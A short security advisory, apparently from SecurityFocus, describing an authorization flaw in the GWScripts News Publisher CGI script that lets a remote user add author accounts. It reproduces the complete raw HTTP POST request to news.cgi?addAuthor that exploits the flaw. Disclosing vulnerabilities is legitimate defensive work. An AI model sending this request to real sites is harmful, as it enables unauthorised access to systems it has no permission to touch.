GWScripts News Publisher author.file Write Vulnerability

It is possible for a remote user to add an author to the author index (author.file) in GWScripts News Publisher, a web news publisher. This can be done by requesting the following raw HTTP request using any arbitrary username and password:

POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0
Connection: close
User-Agent: user/browser
Host: target
Referer: http://target/cgi-bin/news/news.cgi
Content-type: application/x-www-form-urlencoded
Content-length: 71

author=<username>&apassword=<password>&email=<email address>&name=<username>&password=<password>


 

Privacy Statement
Copyright 2010, SecurityFocus